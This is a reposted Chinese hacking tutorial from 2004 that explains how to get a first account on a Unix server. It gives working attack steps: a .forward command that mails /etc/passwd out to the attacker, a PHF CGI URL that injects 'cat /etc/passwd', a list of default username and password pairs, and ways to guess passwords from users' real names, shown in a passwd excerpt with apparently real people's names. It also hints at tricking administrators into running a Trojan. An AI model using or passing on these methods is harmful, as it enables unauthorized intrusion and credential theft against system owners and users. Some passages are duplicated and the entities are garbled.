首页 电脑 电脑学堂 查看内容

如何获得第一个帐号

2004-9-29 20:05 1151 0

摘要:   我们这种水平不高的黑客入侵都是先得到系统的一个有效帐号,进入后再利用系统BUG得到ROOT权限或想办法得到SHADOW再解密.无论是利用系统漏洞还是得到SHADOW都是有一定规律可寻的,通常你到一...
关键词: 帐号 密码 一些 方法 nbsp 如果 PASSWD 系统 bin 信息

  我们这种水平不高的黑客入侵都是先得到系统的一个有效帐号,进入后再利用系统BUG得到ROOT权限或想办法得到SHADOW再解密.无论是利用系统漏洞还是得到SHADOW都是有一定规律可寻的,通常你到一些黑客站点找到对应系统相应版本的EXPLOIT编译后执行就行了.我感觉最困难的是获得第一个有效的帐号,有时侯费尽力气也得不到,后来总算是积累了一些经验,想写出来和大家交流一下,希望能抛砖引玉,请高手们把更好的方法告诉我.  确定了目标以后,我通常是先用匿名FTP去看一下,许多网站都开匿名FTP,帐号用ANONYMOUS或是FTP,密码用一个EMAIL帐号(当然是假的),进入后到/etc目录下把PASSWD拿回来,一般情况下都是一份很不全的名单,只有几个系统帐号,那就算白来了:-}但有的时候会有比较傻的管理员把一些普通帐号放进去,这就是很重要的信息,虽然只有帐号没有密码,但毕竟迈出了第一步.如果FTP主目录是drwxr-xr-x,做一个.foward文件传上去,在UNIX下的命令应该是echo"quot;| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail [email protected]"quot; "gt; .forward然后给匿名用户写一封信,它会把PASSWD发给你。  如果目标没有匿名FTP,就通过WWW访问它的主页,看看上面有什么信息,例如通过一些联系人的EMAIL你就可以发现一些帐号,有的网页上甚至列出了EMAIL通讯录,这对黑客来讲就是无价之宝.把这些帐号记下来,非常有用. 以上几个方法都不行的话,那就试试PHF查询.在浏览器的地址栏输入http://攻击目标/cgi-bin/phf/?Qalias=xcat /etc/passwd如果成功的话会显示出PASSWD来,但是成功率极低:-"lt;  还可以利用目标的FINGER功能来积累帐号,如利用HAKTEK(一种扫描器)来监视目标,一旦有人登陆该主机就会报告给你.但这种方法的缺点就是浪费时间,如果你是自己花钱上网的话可就要出血了! 很有可能以上的方法都不行,那只好使出我的看家本事了-------猜!!!有一些系统默认的帐号,例如:帐号     密码----------- ----------------root    rootsys     sys/system/binbin     sys/binmountfsys  mountfsysadm     admuucp    uucpnuucp    anonanon    anonuser    usergames    gamesinstall   installreboot   给 "quot;command login"quot; 用的demo    demoumountfsys umountfsyssync     syncadmin    adminguest    guestdaemon   daemon________________________________________________________________有些管理员忘记把他们改掉,那你就发财了!另外还有一些习惯性帐号如:test,www,html,web,oracle,setup,sybase,john,tom等也都应该试一试. 只有帐号还不能进入系统,但有了帐号搞密码就容易一些了,主要办法还是猜.如果是通过PASSWD知道帐号的那你应该会发现该用户的许多信息,例如:.........xlguo:x:263:50:Guo xiaolin:/usr/xlguo:/bin/shqingyuan:x:275:50::/usr/qingyuan:/bin/shhjhuang:x:278:50:Huang Haijun:/usr/hjhuang:/bin/shsmlian:x:282:50:Mr. Lan Shumin:/usr/smlian:/bin/shkyc:x:293:50:Department of Science "amp; Technology:/usr/kyc:/bin/shbrlu:x:300:50:Lu Baoren:/usr/brlu:/bin/shtide:x:301:50:Wang XinYi:/usr/tide:/bin/sh............这是一部分PASSWD,从这儿我们可以得到七个帐号,注意每一行的第五项,那是该用户的真实姓名,对!就用它来做密码试.成功率还是比较高的.  如果是用其他方法获得帐号的,就用FINGER查询来获得相关信息.例如知道一个帐号support,我们就用网络刺客II里的FINGER项来侦察[email protected]会获得很多该帐号的信息例如真名实姓,电话号码等就用这些做密码来猜"quot;"gt;如果是用其他方法获得帐号的,就用FINGER查询来获得相关信息.例如知道一个帐号support,我们就用网络刺客II里的FINGER项来侦察[email protected]会获得很多该帐号的信息例如真名实姓,电话号码等就用这些做密码来猜.  当然最可能的密码还是帐号本身和一些帐号的变形,如帐号是john,密码可能是nhoj,john123,john888等.或是一些简单数字.总之是要费一番工夫来猜的. 如果还猜不出密码,只好用LETMEIN之类的东西来猜,字典一定要好.否则,你的电话费就要.....而且这种方法比较危险,还是不用为好. 最后实在不行还有一种比较卑劣的手段,就是给该网站的网管写封信,想办法骗他执行特洛伊木马,然后再.......算了,不说了. 你可能发现以上这些方法都不能百分之百的成功,或者说成功率是比较低的,因为我也不知道更好的方法.但我感到一定有一种更好的方法,希望有高手见到此文能告诉我. 
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部